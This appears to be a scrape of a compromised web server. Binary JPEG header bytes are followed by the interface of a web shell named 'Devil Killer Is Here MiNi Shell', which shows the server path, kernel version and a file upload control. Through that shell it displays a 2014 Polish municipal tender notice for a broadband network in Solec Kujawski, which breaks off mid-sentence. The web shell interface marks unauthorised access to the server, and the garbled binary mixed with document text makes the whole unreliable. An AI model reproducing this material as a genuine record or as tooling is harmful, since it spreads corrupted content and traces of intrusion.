JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/201278-N-2014.html

<p class="kh_header"><b>Solec Kujawski: Budowa sieci szerokopasmowej na terenie miasta Solec Kujawski - II etap.</b><br>
<b>Numer ogłoszenia: 201278 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Solec Kujawski , ul. 23 Stycznia 7, 86-050 Solec Kujawski, woj. kujawsko-pomorskie, tel. 52 3871325, faks 52 3871253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.soleckujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci szerokopasmowej na terenie miasta Solec Kujawski - II etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje: budowę kompletnej, działającej sieci szerokopasmowej obejmującej swym zasięgiem znaczną część obszaru miasta Solec Kujawski, zgodnie z wymaganiami opisanymi w dokumentacji projektowej (zał. nr 13 do SIWZ), Specyfikacjach Technicznych Wykonanie i Odbioru Robót (zał. nr 12 do SIWZ) oraz pozostałych dokumentach przetargowych. W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:opracowania niezbędnych projektów w zakresie nieobjętym posiadaną przez Zamawiającego dokumentacją projektową (w tym projekt sieci LAN w budynkach Urzędu, projekty przyłączy energetycznych dla zasilenia infokiosków w zakresie umożliwiającym zgłoszenie robót do właściwych organów administracji, projekty budowy zasilania gwarantowanego urządzeń teleinformatycznych w jednostkach podłączanych do sieci);pozyskania niezbędnych opinii, uzgodnień, sprawdzeń rozwiązań projektowych i pozwoleń w zakresie wynikającym z obowiązujących przepisów lub wymagań określonych w STWiOR
adaptacji wskazanych w STWiOR pomieszczeń w zakresie niezbędnym dla umożliwienia montażu i pracy wyposażenia teleinformatycznego wraz dostawą tego wyposażenia (np. szafy teleinformatyczne, systemy p. poż. itd.);budowy infrastruktury światłowodowej sieci MAN składającej się z części pasywnej (ułożenie kabli światłowodowych w kanalizacji kablowej wraz z budową brakujących odcinków tej kanalizacji) i aktywnej (montaż i uruchomienie routerów, firewalli, przełączników i oprogramowania zarządzającego siecią) zgodnie z wymaganiami niniejszego dokumentu oraz dokumentacją projektową,zaprojektowania i uruchomienia sieci WLAN w zakresie opisanym w niniejszym dokumencie,budowy sieci LAN (części pasywnej jak i aktywnej) w budynkach Urzędu Miasta i Gminy wraz z dostarczeniem i uruchomieniem środowiska serwerowego oraz konfiguracją wszystkich wymaganych systemów i usług,dostarczenia urządzeń teleinformatycznych (komputery, laptopy) wraz z oprogramowaniem,budowy i uruchomienia 4 Infokiosków zewnętrznych wraz z budową przyłączy energetycznych dla ich zasilenia,zaplanowania, przygotowania, zorganizowania i przeprowadzenia szkoleń dla administratora i użytkowników sieci,
wykonania i dostarczenia dokumentacji użytkowej oraz dokumentacji powdrożeniowej,
świadczenia usługi asysty w pierwszym okresie gwarancji, tj. w okresie 12 miesięcy od daty odbioru ostatecznego zadania,świadczenie usługi serwisu gwarancyjnego w okresie 60 miesięcy od daty odbioru ostatecznego zadania, zgodnie z wymaganiami SLA (Service Level Agreement - katalog świadczonych usług gwarancyjnych) opisanymi w PFU;oznakowania dostarczonych urządzeń teleinformatycznych identyfikatorami programu dofinansowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.43.00.00-6, 32.42.00.00-3, 32.50.00.00-8, 48.00.00.00-8, 71.32.00.00-7, 72.00.00.00-5, 72.70.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w kwocie 100.000 zł
Wadium może być wnoszone w jednej lub kilku następujących formach: 
pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm. 5) ). 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku PEKAO SA  Nr 60 1240 3507 1111 0000 3057 6548
W przypadku wadium wnoszonego w formie bezgotówkowej, dokument wadium należy w formie nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię dołączyć  do oferty. Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli wykaże, iż w ciągu ostatnich  pięciu lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał co najmniej:
a)dwa zadania o wartości minimum 2 mln zł brutto polegające na budowie rozległej sieci światłowodowej) wraz z jej uruchomieniem, tj. dostawą urządzeń aktywnych i oprogramowania zarządzającego;b)jedno zadanie o wartości minimum 500 tys. zł brutto polegające na budowie i uruchomieniu sieci Wifi w ogólnodostępnej przestrzeni miejskiej, składającej się minimum z 10 szt. nadajników radiowych;c)jedno zadanie o wartości minimum 300 tys. zł brutto polegające na budowie i uruchomieniu sieci LAN obejmującej co najmniej 90 punktów podłączeniowych.pod pojęciem rozległa sieć światłowodowa Zamawiający rozumie sieć światłowodową o długości min 5 km oraz co najmniej 10 przyłączach dla zasilenia odbiorców. Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże wykonanie opisanego powyżej zakresu rzeczowego robót w odrębnych, pojedynczych zadaniach lub w min dwóch zadaniach obejmujących opisane zakresy, pod warunkiem wyspecyfikowania robót i ich wartości dla wykazania wykonania opisanych powyżej zakresów zadań. Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia-nie spełnia, na podstawie dokumentów dołączonych przez wykonawcę do oferty, określonych w Rozdziale VI pkt. 1.2 SIWZ. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23 ustawy Uzp. (np. konsorcjum, spółka cywilna), ww warunek udziału w postępowaniu spełniają łącznie.Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww warunek, gdy wykaże, że dysponuje lub będzie dysponował: wdmuchiwarką światłowodów do wprowadzania przewodów telekomunikacyjnych w kanalizację wtórną metodą tłoczkowo - strumieniową,
przyrządami pomiarowymi w technologii światłowodowej, tj.reflektometrem - OTDR (Optical Time Domain Reflectometer).spawarką światłowodową do łączenia włókien światłowodowych. Ocena spełniania wymienionego powyższego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia-nie spełnia, na podstawie dokumentów dołączonych przez wykonawcę do oferty, określonych w Rozdziale VI pkt. 1.6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli
1)wykaże, że dysponuje lub będzie dysponował osobami o kwalifikacjach opisanych poniżej: 1.Kierownik Projektu- wykształcenie wyższe w specjalności elektronika lub telekomunikacja. Osoba posiadająca minimum 3-letnie doświadczenie zawodowe w zakresie kierowania projektami, potwierdzone udziałem w charakterze kierownika projektu w 2 inwestycjach polegających na budowie infrastruktury teleinformatycznej lub telekomunikacyjnej o wartości co najmniej 1mln brutto każda.
2.Kierownik Robót Instalacyjnych z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Osoba posiadająca minimum 3 letnie doświadczenie w zakresie kierowania robotami instalacyjnymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz uprawnienia eksploatacyjne SEP do 1 kVA.
3.Projektant z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności telekomunikacyjnej.Osoba posiadająca minimum 3 letnie doświadczenie w projektowaniu infrastruktury telekomunikacyjnej lub teleinformatycznej w zakresie telekomunikacji przewodowej.
4.Kierownik Robót Budowlanych z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności architektonicznej lub konstrukcyjno-budowlanej 	Osoba posiadająca minimum 3 letnie doświadczenie w zakresie kierowania robotami budowlanymi 
5.Specjalista ds. projektowania i budowy systemów radiowych.Osoba posiadająca certyfikat wydany przez producenta oferowanego sprzętu radiowego, potwierdzający kompetencje w zakresie projektowania i uruchamiania sieci Wifi 
6.Specjalista ds. montażu, konfiguracji i obsługi oferowanych urządzeń sieciowych 	Osoba posiadająca certyfikat wydany przez producenta oferowanego sprzętu sieciowego, potwierdzający kompetencje w zakresie konfiguracji i utrzymania oferowanych urządzeń sieci
7.Specjalista ds. pomiarów certyfikacyjnych sieci strukturalnej - min. jeden pomiarowiec. Osoba posiadająca certyfikaty   potwierdzające  posiadanie  kwalifikacji   do   przeprowadzania   pomiarów  i certyfikacji   okablowania   strukturalnego   wymaganej   kategorii,   wydane   przez   producenta mierników do weryfikacji okablowania (sieci MAN oraz LAN)
Uwaga: 1.Zamawiający, określając wymogi w zakresie posiadanych uprawnień, dopuszcza odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.  Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz.U. Nr 63, poz. 394 z późn. zm). 2.Zamawiający dopuszcza pełnienie przez jedną osobę nie więcej niż dwóch funkcji opisanych w tabeli powyżej.
3.Każdy z członków personelu Wykonawcy powinien biegle posługiwać się językiem polskim lub komunikować się w języku polskim za pomocą tłumacza.
Wykonawca jest zobowiązany do wskazania osób odpowiedzialnych za wykonanie usługi, z podaniem: imion i nazwisk, kwalifikacji i doświadczenia zawodowego oraz informacji o podstawie do dysponowania tymi osobami Ocena spełniania wymienionego powyższego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia-nie spełnia, na podstawie dokumentów dołączonych przez wykonawcę do oferty, określonych w Rozdziale VI pkt. 1.4 i 1.5 SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp (np. konsorcjum, spółka cywilna), ww warunek udziału w postępowaniu spełniają łącznie.Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 2)jeżeli wykaże wielkość średniego rocznego zatrudnienia w ilości co najmniej 5 osób, w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.Ocena spełniania wymienionego powyższego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia-nie spełnia, na podstawie dokumentów dołączonych przez wykonawcę do oferty, określonych w Rozdziale VI pkt. 1.7 SIWZ. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp(np. konsorcjum, spółka cywilna, ww warunek udziału w postępowaniu spełniają łącznie.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww warunek jeżeli wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 2.000 000,00 zł.
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium  spełnia-nie spełnia, na podstawie dokumentów dołączonych przez wykonawcę do oferty, określonego w Rozdziale VI pkt. 1.7 SIWZ
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23 ustawy Uzp (np. konsorcjum, spółka cywilna), ww.warunek udziału w postępowaniu spełniają łącznie.Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda: 
przedłożenia wykazu oferowanych urządzeń i oprogramowania (zał. nr 9 do SIWZ) wraz z ich opisem technicznym;przedstawienia następujących dokumentów, potwierdzających parametry oferowanych urządzeń:
a)W zakresie punktu 2.4.7 określonego w ST_04 jako  Stanowisko zarządzania - szt. 1. wydruki oprogramowania testującego lub wydruki zawartości ekranu [print screan] z przeprowadzonych testów, potwierdzone za zgodność z oryginałem przez Wykonawcę w zakresie wydajności komputera, pamięci operacyjnej RAM, pamięci masowej i karty graficznej,b)W zakresie punktu  4.1 określonego w ST_04 jako Komputery stacjonarne - szt.7 -wydruki oprogramowania testującego lub wydruki zawartości ekranu [print screan] z przeprowadzonych testów, potwierdzone za zgodność z oryginałem przez Wykonawcę w zakresie wydajności oferowanych komputerów stacjonarnych, pamięci operacyjnej RAM, pamięci masowej i kart graficznych,-dokument potwierdzający poprawną współpracę oferowanych komputerów z oferowanym systemem operacyjnym  np. w formie wydruku  ze strony www producenta oprogramowania. c)W zakresie punktu 4.3 określonego w ST-04 jako Komputery typu laptop szt.2-wydruki oprogramowania testującego lub wydruki zawartości ekranu [print screan] z przeprowadzonych testów, potwierdzone za zgodność 